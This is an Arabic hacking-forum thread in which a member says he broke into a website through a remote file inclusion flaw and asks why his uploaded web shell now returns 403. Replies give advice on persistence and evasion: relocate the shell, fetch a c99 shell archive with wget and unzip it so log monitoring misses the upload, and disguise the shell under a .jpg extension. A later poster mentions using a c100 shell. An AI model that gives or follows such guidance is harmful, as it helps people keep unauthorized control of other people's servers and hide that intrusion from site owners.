:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   جـــ'ابات العناكــ'ب (http://www.vbspiders.com/vb/f343.html)
-   -   للخبراء ... ! بخصوص Forbidden 403 (http://www.vbspiders.com/vb/t29141.html)

TIKTAKram 05-10-2010 04:05 PM

للخبراء ... ! بخصوص Forbidden 403
 
http://img6.imageshack.us/img6/260/h...hackusina1.gif

أهلا إخواني الكرام

البارحة إخترقت موقع عن طريق ثغرة روموت فايل إنكلود

و كل شيء عادي، لكن اليوم تفاجئت أنني لم أستطع الدخول إلى الشيل

يعطي الخطأ Forbidden 403 و يقول أنني لا أملك التصريح بالدخول إلى الصفحة

فيما يلي توضيح بالصور :

http://img683.imageshack.us/img683/3...nstitreymt.jpg


http://img704.imageshack.us/img704/8738/91418953.jpg


مع أنني قلت ممكن أجرب أغير الآيبي لعل !

لكن بقي الأمر نفسه، قمت بتشغيل الــ VPN لكن لا جدوى

لهذا ...! أي شخص عنده حل فليتفضل

بالتوفيق أحبائي

ZrIqE ViRuS 05-11-2010 01:27 AM

من ناحيه فكره الاي بي منطقيه


ممكن صاحب الموقع عامل حظر ع المجلدات لحتى يحميها بانه ما يدخلها غير اي بي دوله معينه

وهذا بتم عن طريق هتاكتتس بامر بسيط يسمح لاي بي معين واحد
لكن يلزم هون شيء هو تثبيت الاي بي او وضع بروكسي دائم شغال + ممكن ما يلزم الادمن يدخل هاي اللوحه

مثل هيك حمايه انا استبعدها وبعتقد لو بده الادمن يحمي موقعه راح يرقع الثغره افضل :)

-------

في مشكله بالفوربدن مره حصلت معي لما رفعت شل ع موقع رفعت معاه ميلر
وبعد استخدام الميلر شكل ضغط ع السيرفر

وخلال اقل من اسبوع لقيته يعطيني نفس الرساله عندك وكان ما يشغل ايا شل وسكربت php داخل المسار

لذا الحل الي اراه الان
غير المكان الي عم ترفع فيه الشل

وننتظر ردك :)

(يفضل الدخول الى مسارات فرعيه وان لم تنجح ارفع ع public_html

TIKTAKram 05-11-2010 02:34 PM

أهلا حبيبي

يا أخي أنا إخترقت الموقع و رفعت الشيل

لكن تفاجئت باليوم التالي ما يسمح لي أن أعمل أي شيء

يعني يسمح لي فقط بدخول رابط الموقع الرئيسي

أما الدخول للشيل أو هيك أو هيك فلا

لا أعرف كأنه كشف أنني إخترقت الموقع فقام بالتعديل و جعل هذه المجلدات لا يدخلها أحد إلا الأدمن

يعني أنا الآن حتى الشيل لي رفعته ما أقدر أدخل عليه

بالتوفيق

KaLa$nikoV 07-19-2010 11:05 AM

اعرف ردي متاخر كثير :]


هناك نظام حمايه ببعض السيرفرات يخلي تصريح المجلدات 600 او غيره من التصاريح :]
اذا وجد شيل داخل مجلد

بهاي الحاله عليك رفع الشل على الرئيسيه حتى مدير الموقع بنفسه يرجع التصريح زي ما كان


الحمايه ممكن تصيب المجلدات مثل هيك خاصه في حال العضو عمل سبام


في حال تريد رفع شل على مجلد دون لا يصيبك نفس المشكله


مثلا انت رافع شلك بهاد المسار

/home/user/public_html/images/c99.php


بتتنقل بالشل لهاد المسار مثلا

/home/user/public_html/volcano

وبعد تسحب الشل ع السيرفر بالاوامر

wget http://google.com/c99.zip

and
unzip c99.zip

راح يطلع لك الشل بهاي الحاله :]

والاشي الاهم انك ما تدخله

راح تسالني انت ليش كل هاي الخطوات

بقولك

اللوجز انواع والغالب بهيك حالات براقب اللوجز تاع مسار الملفات والاعضاء وين بزورو ملفات

رح يظهر انك زرت ملف
volcano
بس ما رح تشوف شيء من الاوامر او الشلات انك رفعتها


وفيك تعمل حاجات ثانيه

في هتاكتتتس يغير الامتداد والله نسيتو بس هو رائع

تضع امتداد الشل jpg

وترفع الشل بامتداد jpg

واخو اخته وابن عمته يشك فيه انه شيل


الحيل كثيره


ربنا يوفقك بغيره

dz-fox 07-19-2010 11:42 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة VoLc4n0 (المشاركة 174823)
اعرف ردي متاخر كثير :]


هناك نظام حمايه ببعض السيرفرات يخلي تصريح المجلدات 600 او غيره من التصاريح :]
اذا وجد شيل داخل مجلد

بهاي الحاله عليك رفع الشل على الرئيسيه حتى مدير الموقع بنفسه يرجع التصريح زي ما كان


الحمايه ممكن تصيب المجلدات مثل هيك خاصه في حال العضو عمل سبام


في حال تريد رفع شل على مجلد دون لا يصيبك نفس المشكله


مثلا انت رافع شلك بهاد المسار

/home/user/public_html/images/c99.php


بتتنقل بالشل لهاد المسار مثلا

/home/user/public_html/volcano

وبعد تسحب الشل ع السيرفر بالاوامر

wget http://google.com/c99.zip

and
unzip c99.zip

راح يطلع لك الشل بهاي الحاله :]

والاشي الاهم انك ما تدخله

راح تسالني انت ليش كل هاي الخطوات

بقولك

اللوجز انواع والغالب بهيك حالات براقب اللوجز تاع مسار الملفات والاعضاء وين بزورو ملفات

رح يظهر انك زرت ملف
volcano
بس ما رح تشوف شيء من الاوامر او الشلات انك رفعتها


وفيك تعمل حاجات ثانيه

في هتاكتتتس يغير الامتداد والله نسيتو بس هو رائع

تضع امتداد الشل jpg

وترفع الشل بامتداد jpg

واخو اخته وابن عمته يشك فيه انه شيل


الحيل كثيره


ربنا يوفقك بغيره

الله يخليك يا زعيم

و الله حدثت لي مرة

رفعت الشيل عادي و بدأت أصفق هههه

خصوصا انه c100 يعني تحكم شامل لكن عند اول خطوة خطيرة

قام السيرفر بتحويلي الى صفحة حارجية ههه

شكرا للافادة فلكانو


الساعة الآن 09:17 AM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0